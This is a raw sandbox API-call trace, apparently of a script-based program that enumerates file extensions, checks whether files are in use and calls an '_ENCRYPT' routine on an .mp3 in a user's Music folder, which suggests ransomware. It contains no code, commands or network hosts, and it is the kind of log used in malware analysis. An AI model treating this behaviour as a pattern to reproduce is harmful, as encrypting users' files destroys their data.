[0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.924] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.924] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0037.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.924] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.925] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.925] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.925] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.926] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.927] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.927] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.928] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.928] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.928] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.928] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.928] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.928] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.928] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2369, lpOverlapped=0x0) returned 1 [0037.929] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.929] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2369, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.929] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.929] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.929] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.929] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.929] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.929] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.929] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.930] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c988 [0037.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c988, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.930] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\fxfiITiq48pQW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\fxfiitiq48pqw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.930] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.930] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.931] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.931] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.931] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0037.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cda8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.931] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.931] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0037.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.931] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.932] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.932] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0037.932] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.932] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0037.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.932] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0037.932] PeekMessageW 